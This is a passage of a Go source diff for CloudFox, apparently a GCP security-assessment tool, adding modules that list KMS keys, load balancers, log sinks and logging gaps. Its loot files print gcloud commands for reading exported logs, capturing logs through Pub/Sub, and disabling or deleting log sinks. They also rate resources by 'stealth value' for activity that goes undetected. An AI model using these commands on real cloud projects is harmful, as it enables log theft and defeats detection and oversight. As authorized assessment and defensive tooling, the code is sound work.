[]string{ + "Project ID", + "Key Name", + "Key Ring", + "Location", + "Purpose", + "Protection", + "Version", + "State", + "Rotation", + "Public Decrypt", + } + + var keysBody [][]string + for _, key := range m.CryptoKeys { + // Format rotation + rotation := "-" + if key.RotationPeriod != "" { + rotation = formatDuration(key.RotationPeriod) + } + + // Format public decrypt + publicDecrypt := "No" + if key.IsPublicDecrypt { + publicDecrypt = "YES!" + } + + // Format protection level + protection := key.ProtectionLevel + if protection == "" { + protection = "SOFTWARE" + } + + keysBody = append(keysBody, []string{ + key.ProjectID, + key.Name, + key.KeyRing, + key.Location, + formatPurpose(key.Purpose), + protection, + key.PrimaryVersion, + key.PrimaryState, + rotation, + publicDecrypt, + }) + } + + // Key rings table (summary) + keyRingsHeader := []string{ + "Project ID", + "Key Ring", + "Location", + "Key Count", + } + + var keyRingsBody [][]string + for _, kr := range m.KeyRings { + keyRingsBody = append(keyRingsBody, []string{ + kr.ProjectID, + kr.Name, + kr.Location, + fmt.Sprintf("%d", kr.KeyCount), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(keysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keys", + Header: keysHeader, + Body: keysBody, + }) + } + + if len(keyRingsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keyrings", + Header: keyRingsHeader, + Body: keyRingsBody, + }) + } + + output := KMSOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_KMS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatPurpose formats key purpose for display +func formatPurpose(purpose string) string { + switch purpose { + case "ENCRYPT_DECRYPT": + return "Symmetric" + case "ASYMMETRIC_SIGN": + return "Sign" + case "ASYMMETRIC_DECRYPT": + return "Asymm Decrypt" + case "MAC": + return "MAC" + default: + return purpose + } +} + +// formatDuration formats a duration string for display +func formatDuration(duration string) string { + // Duration is in format like "7776000s" (90 days) + duration = strings.TrimSuffix(duration, "s") + if duration == "" { + return "-" + } + + // Parse seconds + var seconds int64 + fmt.Sscanf(duration, "%d", &seconds) + + if seconds == 0 { + return "-" + } + + days := seconds / 86400 + if days > 0 { + return fmt.Sprintf("%dd", days) + } + + hours := seconds / 3600 + if hours > 0 { + return fmt.Sprintf("%dh", hours) + } + + return fmt.Sprintf("%ds", seconds) +} diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go new file mode 100644 index 00000000..be728c4d --- /dev/null +++ b/gcp/commands/loadbalancers.go @@ -0,0 +1,269 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + loadbalancerservice "github.com/BishopFox/cloudfox/gcp/services/loadbalancerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoadBalancersCommand = &cobra.Command{ + Use: globals.GCP_LOADBALANCERS_MODULE_NAME, + Aliases: []string{"lb", "lbs"}, + Short: "Enumerate Load Balancers", + Long: `Enumerate Load Balancers and related configurations. + +Features: +- Lists all forwarding rules (global and regional) +- Shows backend services and health checks +- Analyzes SSL policies for weak configurations +- Identifies external vs internal load balancers +- Checks for Cloud Armor security policies`, + Run: runGCPLoadBalancersCommand, +} + +type LoadBalancersModule struct { + gcpinternal.BaseGCPModule + LoadBalancers []loadbalancerservice.LoadBalancerInfo + SSLPolicies []loadbalancerservice.SSLPolicyInfo + BackendServices []loadbalancerservice.BackendServiceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type LoadBalancersOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoadBalancersOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoadBalancersOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPLoadBalancersCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOADBALANCERS_MODULE_NAME) + if err != nil { + return + } + + module := &LoadBalancersModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + LoadBalancers: []loadbalancerservice.LoadBalancerInfo{}, + SSLPolicies: []loadbalancerservice.SSLPolicyInfo{}, + BackendServices: []loadbalancerservice.BackendServiceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *LoadBalancersModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOADBALANCERS_MODULE_NAME, m.processProject) + + if len(m.LoadBalancers) == 0 { + logger.InfoM("No load balancers found", globals.GCP_LOADBALANCERS_MODULE_NAME) + return + } + + externalCount := 0 + for _, lb := range m.LoadBalancers { + if lb.Scheme == "EXTERNAL" { + externalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d load balancer(s) (%d external), %d SSL policies, %d backend services", + len(m.LoadBalancers), externalCount, len(m.SSLPolicies), len(m.BackendServices)), globals.GCP_LOADBALANCERS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *LoadBalancersModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating load balancers in project: %s", projectID), globals.GCP_LOADBALANCERS_MODULE_NAME) + } + + svc := loadbalancerservice.New() + + // Get load balancers + lbs, err := svc.ListLoadBalancers(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list load balancers: %v", err), globals.GCP_LOADBALANCERS_MODULE_NAME) + } + } else { + m.mu.Lock() + m.LoadBalancers = append(m.LoadBalancers, lbs...) + m.mu.Unlock() + } + + // Get SSL policies + sslPolicies, err := svc.ListSSLPolicies(projectID) + if err == nil { + m.mu.Lock() + m.SSLPolicies = append(m.SSLPolicies, sslPolicies...) + m.mu.Unlock() + } + + // Get backend services + backends, err := svc.ListBackendServices(projectID) + if err == nil { + m.mu.Lock() + m.BackendServices = append(m.BackendServices, backends...) + m.mu.Unlock() + } + + m.mu.Lock() + for _, lb := range lbs { + m.addToLoot(lb) + } + m.mu.Unlock() +} + +func (m *LoadBalancersModule) initializeLootFiles() { + m.LootMap["load-balancers"] = &internal.LootFile{ + Name: "load-balancers", + Contents: "# Load Balancers\n# Generated by CloudFox\n\n", + } + m.LootMap["external-ips"] = &internal.LootFile{ + Name: "lb-external-ips", + Contents: "", + } +} + +func (m *LoadBalancersModule) addToLoot(lb loadbalancerservice.LoadBalancerInfo) { + m.LootMap["load-balancers"].Contents += fmt.Sprintf( + "# LB: %s\n# Type: %s\n# Scheme: %s\n# IP: %s\n# Port: %s\n\n", + lb.Name, lb.Type, lb.Scheme, lb.IPAddress, lb.Port) + + if lb.Scheme == "EXTERNAL" && lb.IPAddress != "" { + m.LootMap["external-ips"].Contents += fmt.Sprintf("%s # %s (%s)\n", lb.IPAddress, lb.Name, lb.Type) + } +} + +func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Load Balancers table + lbHeader := []string{"Name", "Type", "Scheme", "IP Address", "Port", "Region", "Risk", "Project"} + var lbBody [][]string + for _, lb := range m.LoadBalancers { + lbBody = append(lbBody, []string{ + lb.Name, + lb.Type, + lb.Scheme, + lb.IPAddress, + lb.Port, + lb.Region, + lb.RiskLevel, + lb.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "load-balancers", + Header: lbHeader, + Body: lbBody, + }) + + // SSL Policies table + if len(m.SSLPolicies) > 0 { + sslHeader := []string{"Name", "Min TLS", "Profile", "Risk", "Project"} + var sslBody [][]string + for _, policy := range m.SSLPolicies { + sslBody = append(sslBody, []string{ + policy.Name, + policy.MinTLSVersion, + policy.Profile, + policy.RiskLevel, + policy.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "ssl-policies", + Header: sslHeader, + Body: sslBody, + }) + } + + // Backend Services table + if len(m.BackendServices) > 0 { + beHeader := []string{"Name", "Protocol", "Security Policy", "CDN", "Health Check", "Risk", "Project"} + var beBody [][]string + for _, be := range m.BackendServices { + cdn := "No" + if be.EnableCDN { + cdn = "Yes" + } + secPolicy := be.SecurityPolicy + if secPolicy == "" { + secPolicy = "(none)" + } + beBody = append(beBody, []string{ + be.Name, + be.Protocol, + secPolicy, + cdn, + be.HealthCheck, + be.RiskLevel, + be.ProjectID, + }) + } + tables = append(tables, internal.TableFile{ + Name: "backend-services", + Header: beHeader, + Body: beBody, + }) + } + + // High-risk findings table + var highRiskBody [][]string + for _, lb := range m.LoadBalancers { + if lb.RiskLevel == "HIGH" || lb.RiskLevel == "MEDIUM" { + highRiskBody = append(highRiskBody, []string{ + "LoadBalancer", + lb.Name, + lb.RiskLevel, + strings.Join(lb.RiskReasons, "; "), + lb.ProjectID, + }) + } + } + for _, policy := range m.SSLPolicies { + if policy.RiskLevel == "HIGH" || policy.RiskLevel == "MEDIUM" { + highRiskBody = append(highRiskBody, []string{ + "SSLPolicy", + policy.Name, + policy.RiskLevel, + strings.Join(policy.RiskReasons, "; "), + policy.ProjectID, + }) + } + } + + if len(highRiskBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lb-risks", + Header: []string{"Type", "Name", "Risk Level", "Reasons", "Project"}, + Body: highRiskBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := LoadBalancersOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOADBALANCERS_MODULE_NAME) + } +} diff --git a/gcp/commands/logging.go b/gcp/commands/logging.go new file mode 100644 index 00000000..4ec0de54 --- /dev/null +++ b/gcp/commands/logging.go @@ -0,0 +1,442 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + LoggingService "github.com/BishopFox/cloudfox/gcp/services/loggingService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoggingCommand = &cobra.Command{ + Use: globals.GCP_LOGGING_MODULE_NAME, + Aliases: []string{"logs", "sinks", "log-sinks"}, + Short: "Enumerate Cloud Logging sinks and metrics with security analysis", + Long: `Enumerate Cloud Logging sinks and log-based metrics across projects. + +Features: +- Lists all logging sinks (log exports) +- Shows sink destinations (Storage, BigQuery, Pub/Sub, Logging buckets) +- Identifies cross-project log exports +- Shows sink filters and exclusions +- Lists log-based metrics for alerting +- Generates gcloud commands for further analysis + +Security Columns: +- Destination: Where logs are exported (bucket, dataset, topic) +- CrossProject: Whether logs are exported to another project +- WriterIdentity: Service account used for export +- Filter: What logs are included/excluded + +Attack Surface: +- Cross-project exports may leak logs to external projects +- Sink writer identity may have excessive permissions +- Disabled sinks may indicate log evasion +- Missing sinks may indicate lack of log retention`, + Run: runGCPLoggingCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LoggingModule struct { + gcpinternal.BaseGCPModule + + Sinks []LoggingService.SinkInfo + Metrics []LoggingService.MetricInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LoggingOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoggingOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoggingOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPLoggingCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGGING_MODULE_NAME) + if err != nil { + return + } + + module := &LoggingModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Sinks: []LoggingService.SinkInfo{}, + Metrics: []LoggingService.MetricInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *LoggingModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGING_MODULE_NAME, m.processProject) + + if len(m.Sinks) == 0 && len(m.Metrics) == 0 { + logger.InfoM("No logging sinks or metrics found", globals.GCP_LOGGING_MODULE_NAME) + return + } + + // Count interesting sinks + crossProjectCount := 0 + disabledCount := 0 + for _, sink := range m.Sinks { + if sink.IsCrossProject { + crossProjectCount++ + } + if sink.Disabled { + disabledCount++ + } + } + + msg := fmt.Sprintf("Found %d sink(s), %d metric(s)", len(m.Sinks), len(m.Metrics)) + if crossProjectCount > 0 { + msg += fmt.Sprintf(" [%d cross-project]", crossProjectCount) + } + if disabledCount > 0 { + msg += fmt.Sprintf(" [%d disabled]", disabledCount) + } + logger.SuccessM(msg, globals.GCP_LOGGING_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LoggingModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Logging in project: %s", projectID), globals.GCP_LOGGING_MODULE_NAME) + } + + ls := LoggingService.New() + + // Get sinks + sinks, err := ls.Sinks(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating logging sinks in project %s: %v", projectID, err), globals.GCP_LOGGING_MODULE_NAME) + } + } else { + m.mu.Lock() + m.Sinks = append(m.Sinks, sinks...) + for _, sink := range sinks { + m.addSinkToLoot(sink) + } + m.mu.Unlock() + } + + // Get metrics + metrics, err := ls.Metrics(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating log metrics in project %s: %v", projectID, err), globals.GCP_LOGGING_MODULE_NAME) + } + } else { + m.mu.Lock() + m.Metrics = append(m.Metrics, metrics...) + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d sink(s), %d metric(s) in project %s", len(sinks), len(metrics), projectID), globals.GCP_LOGGING_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LoggingModule) initializeLootFiles() { + m.LootMap["logging-gcloud-commands"] = &internal.LootFile{ + Name: "logging-gcloud-commands", + Contents: "# Cloud Logging gcloud Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["logging-cross-project"] = &internal.LootFile{ + Name: "logging-cross-project", + Contents: "# Cross-Project Log Exports\n# Generated by CloudFox\n# These sinks export logs to external projects\n\n", + } + m.LootMap["logging-writer-identities"] = &internal.LootFile{ + Name: "logging-writer-identities", + Contents: "# Logging Sink Writer Identities\n# Generated by CloudFox\n# Service accounts that have write access to destinations\n\n", + } + m.LootMap["logging-exploitation"] = &internal.LootFile{ + Name: "logging-exploitation", + Contents: "# Logging Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *LoggingModule) addSinkToLoot(sink LoggingService.SinkInfo) { + // gcloud commands + m.LootMap["logging-gcloud-commands"].Contents += fmt.Sprintf( + "# Sink: %s (Project: %s)\n"+ + "gcloud logging sinks describe %s --project=%s\n\n", + sink.Name, sink.ProjectID, + sink.Name, sink.ProjectID, + ) + + // Cross-project exports + if sink.IsCrossProject { + m.LootMap["logging-cross-project"].Contents += fmt.Sprintf( + "# SINK: %s\n"+ + "# Source Project: %s\n"+ + "# Destination Project: %s\n"+ + "# Destination Type: %s\n"+ + "# Destination: %s\n"+ + "# Filter: %s\n"+ + "# Writer Identity: %s\n\n", + sink.Name, + sink.ProjectID, + sink.DestinationProject, + sink.DestinationType, + sink.Destination, + truncateFilter(sink.Filter), + sink.WriterIdentity, + ) + } + + // Writer identities + if sink.WriterIdentity != "" { + m.LootMap["logging-writer-identities"].Contents += fmt.Sprintf( + "# Sink: %s -> %s\n"+ + "%s\n\n", + sink.Name, sink.DestinationType, + sink.WriterIdentity, + ) + } + + // Exploitation commands + m.LootMap["logging-exploitation"].Contents += fmt.Sprintf( + "# Sink: %s (Project: %s)\n"+ + "# Destination: %s (%s)\n"+ + "# Disabled: %v\n\n"+ + "# Read logs from destination:\n", + sink.Name, sink.ProjectID, + sink.DestinationType, getDestinationName(sink), + sink.Disabled, + ) + + switch sink.DestinationType { + case "storage": + m.LootMap["logging-exploitation"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n"+ + "gsutil cat gs://%s/**.json | head -100\n\n", + sink.DestinationBucket, sink.DestinationBucket, + ) + case "bigquery": + m.LootMap["logging-exploitation"].Contents += fmt.Sprintf( + "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.*` LIMIT 100'\n\n", + sink.DestinationProject, sink.DestinationDataset, + ) + case "pubsub": + m.LootMap["logging-exploitation"].Contents += fmt.Sprintf( + "# Create subscription to capture logs:\n"+ + "gcloud pubsub subscriptions create log-capture --topic=%s --project=%s\n"+ + "gcloud pubsub subscriptions pull log-capture --limit=10 --auto-ack --project=%s\n\n", + sink.DestinationTopic, sink.DestinationProject, sink.DestinationProject, + ) + } + + m.LootMap["logging-exploitation"].Contents += fmt.Sprintf( + "# Disable sink (if you have logging.sinks.update):\n"+ + "gcloud logging sinks update %s --disabled --project=%s\n\n"+ + "# Delete sink (if you have logging.sinks.delete):\n"+ + "gcloud logging sinks delete %s --project=%s\n\n", + sink.Name, sink.ProjectID, + sink.Name, sink.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sinks table + sinksHeader := []string{ + "Project ID", + "Sink Name", + "Destination Type", + "Destination", + "Cross-Project", + "Disabled", + "Filter", + } + + var sinksBody [][]string + for _, sink := range m.Sinks { + // Format destination + destination := getDestinationName(sink) + + // Format cross-project + crossProject := "No" + if sink.IsCrossProject { + crossProject = fmt.Sprintf("Yes -> %s", sink.DestinationProject) + } + + // Format disabled + disabled := "No" + if sink.Disabled { + disabled = "YES" + } + + // Format filter + filter := "-" + if sink.Filter != "" { + filter = truncateFilter(sink.Filter) + } + + sinksBody = append(sinksBody, []string{ + sink.ProjectID, + sink.Name, + sink.DestinationType, + destination, + crossProject, + disabled, + filter, + }) + } + + // Metrics table + metricsHeader := []string{ + "Project ID", + "Metric Name", + "Description", + "Filter", + "Type", + } + + var metricsBody [][]string + for _, metric := range m.Metrics { + // Format description + description := metric.Description + if len(description) > 40 { + description = description[:37] + "..." + } + + // Format filter + filter := truncateFilter(metric.Filter) + + // Format type + metricType := metric.MetricKind + if metric.ValueType != "" { + metricType += "/" + metric.ValueType + } + + metricsBody = append(metricsBody, []string{ + metric.ProjectID, + metric.Name, + description, + filter, + metricType, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(sinksBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-sinks", + Header: sinksHeader, + Body: sinksBody, + }) + } + + if len(metricsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-metrics", + Header: metricsHeader, + Body: metricsBody, + }) + } + + output := LoggingOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGGING_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// getDestinationName returns a human-readable destination name +func getDestinationName(sink LoggingService.SinkInfo) string { + switch sink.DestinationType { + case "storage": + return sink.DestinationBucket + case "bigquery": + return sink.DestinationDataset + case "pubsub": + return sink.DestinationTopic + case "logging": + // Extract bucket name from full path + parts := strings.Split(sink.Destination, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return sink.Destination + default: + return sink.Destination + } +} + +// truncateFilter truncates a log filter for display +func truncateFilter(filter string) string { + // Remove newlines + filter = strings.ReplaceAll(filter, "\n", " ") + filter = strings.ReplaceAll(filter, "\t", " ") + + // Collapse multiple spaces + for strings.Contains(filter, " ") { + filter = strings.ReplaceAll(filter, " ", " ") + } + + // Truncate + if len(filter) > 50 { + return filter[:47] + "..." + } + return filter +} diff --git a/gcp/commands/logginggaps.go b/gcp/commands/logginggaps.go new file mode 100644 index 00000000..289eec60 --- /dev/null +++ b/gcp/commands/logginggaps.go @@ -0,0 +1,345 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + logginggapsservice "github.com/BishopFox/cloudfox/gcp/services/loggingGapsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoggingGapsCommand = &cobra.Command{ + Use: globals.GCP_LOGGINGGAPS_MODULE_NAME, + Aliases: []string{"log-gaps", "stealth", "blind-spots"}, + Short: "Find resources with missing or incomplete logging", + Long: `Identify logging gaps across GCP resources for stealth assessment. + +This module helps identify resources where actions may not be properly logged, +which is valuable for understanding detection blind spots. + +Resources Checked: +- Cloud Storage buckets (access logging) +- VPC subnets (flow logs) +- GKE clusters (workload and system logging) +- Cloud SQL instances (query and connection logging) +- Log sinks and exclusions (export gaps) +- Project-level audit logging configuration + +Output: +- Resources with disabled or partial logging +- Stealth value rating (CRITICAL, HIGH, MEDIUM, LOW) +- Specific missing log types +- Recommendations for defenders +- Commands for testing detection gaps + +Stealth Value Ratings: +- CRITICAL: No logging, actions completely invisible +- HIGH: Significant gaps enabling undetected activity +- MEDIUM: Some logging present but incomplete +- LOW: Minor gaps with limited stealth value`, + Run: runGCPLoggingGapsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LoggingGapsModule struct { + gcpinternal.BaseGCPModule + + Gaps []logginggapsservice.LoggingGap + AuditConfigs []*logginggapsservice.AuditLogConfig + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LoggingGapsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoggingGapsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoggingGapsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPLoggingGapsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGGINGGAPS_MODULE_NAME) + if err != nil { + return + } + + module := &LoggingGapsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Gaps: []logginggapsservice.LoggingGap{}, + AuditConfigs: []*logginggapsservice.AuditLogConfig{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *LoggingGapsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGINGGAPS_MODULE_NAME, m.processProject) + + if len(m.Gaps) == 0 { + logger.InfoM("No logging gaps found - environment has good logging coverage", globals.GCP_LOGGINGGAPS_MODULE_NAME) + return + } + + // Count by stealth value + criticalCount := 0 + highCount := 0 + for _, gap := range m.Gaps { + switch gap.StealthValue { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d logging gap(s)", len(m.Gaps)), globals.GCP_LOGGINGGAPS_MODULE_NAME) + if criticalCount > 0 || highCount > 0 { + logger.InfoM(fmt.Sprintf("[STEALTH] %d CRITICAL, %d HIGH stealth value gaps!", criticalCount, highCount), globals.GCP_LOGGINGGAPS_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LoggingGapsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning logging gaps in project: %s", projectID), globals.GCP_LOGGINGGAPS_MODULE_NAME) + } + + svc := logginggapsservice.New() + gaps, auditConfig, err := svc.EnumerateLoggingGaps(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error scanning project %s: %v", projectID, err), globals.GCP_LOGGINGGAPS_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Gaps = append(m.Gaps, gaps...) + if auditConfig != nil { + m.AuditConfigs = append(m.AuditConfigs, auditConfig) + } + + for _, gap := range gaps { + m.addGapToLoot(gap) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d logging gap(s) in project %s", len(gaps), projectID), globals.GCP_LOGGINGGAPS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LoggingGapsModule) initializeLootFiles() { + m.LootMap["logging-gaps-all"] = &internal.LootFile{ + Name: "logging-gaps-all", + Contents: "# All Logging Gaps\n# Generated by CloudFox\n\n", + } + m.LootMap["logging-gaps-critical"] = &internal.LootFile{ + Name: "logging-gaps-critical", + Contents: "# CRITICAL Stealth Value Gaps\n# Generated by CloudFox\n# Actions on these resources are essentially invisible\n\n", + } + m.LootMap["logging-gaps-stealth-commands"] = &internal.LootFile{ + Name: "logging-gaps-stealth-commands", + Contents: "# Commands for Stealthy Activity\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["logging-gaps-remediation"] = &internal.LootFile{ + Name: "logging-gaps-remediation", + Contents: "# Logging Gap Remediation\n# Generated by CloudFox\n# Recommendations for defenders\n\n", + } +} + +func (m *LoggingGapsModule) addGapToLoot(gap logginggapsservice.LoggingGap) { + // Add to all gaps + m.LootMap["logging-gaps-all"].Contents += fmt.Sprintf( + "## [%s] %s: %s\n"+ + "## Project: %s, Location: %s\n"+ + "## Status: %s\n"+ + "## Missing:\n", + gap.StealthValue, gap.ResourceType, gap.ResourceName, + gap.ProjectID, gap.Location, + gap.LoggingStatus, + ) + for _, missing := range gap.MissingLogs { + m.LootMap["logging-gaps-all"].Contents += fmt.Sprintf("## - %s\n", missing) + } + m.LootMap["logging-gaps-all"].Contents += "\n" + + // Add critical gaps separately + if gap.StealthValue == "CRITICAL" { + m.LootMap["logging-gaps-critical"].Contents += fmt.Sprintf( + "## [CRITICAL] %s: %s\n"+ + "## Project: %s\n"+ + "## Missing Logs:\n", + gap.ResourceType, gap.ResourceName, + gap.ProjectID, + ) + for _, missing := range gap.MissingLogs { + m.LootMap["logging-gaps-critical"].Contents += fmt.Sprintf("## - %s\n", missing) + } + m.LootMap["logging-gaps-critical"].Contents += "\n" + } + + // Add stealth commands + if len(gap.ExploitCommands) > 0 { + m.LootMap["logging-gaps-stealth-commands"].Contents += fmt.Sprintf( + "## [%s] %s: %s (%s)\n", + gap.StealthValue, gap.ResourceType, gap.ResourceName, gap.ProjectID, + ) + for _, cmd := range gap.ExploitCommands { + m.LootMap["logging-gaps-stealth-commands"].Contents += cmd + "\n" + } + m.LootMap["logging-gaps-stealth-commands"].Contents += "\n" + } + + // Add remediation + if len(gap.Recommendations) > 0 { + m.LootMap["logging-gaps-remediation"].Contents += fmt.Sprintf( + "## %s: %s (%s)\n", + gap.ResourceType, gap.ResourceName, gap.ProjectID, + ) + for _, rec := range gap.Recommendations { + m.LootMap["logging-gaps-remediation"].Contents += fmt.Sprintf("# %s\n", rec) + } + m.LootMap["logging-gaps-remediation"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main gaps table + header := []string{ + "Stealth", + "Type", + "Resource", + "Status", + "Missing Logs", + "Project", + } + + var body [][]string + for _, gap := range m.Gaps { + missingLogs := strings.Join(gap.MissingLogs, "; ") + if len(missingLogs) > 50 { + missingLogs = missingLogs[:50] + "..." + } + + body = append(body, []string{ 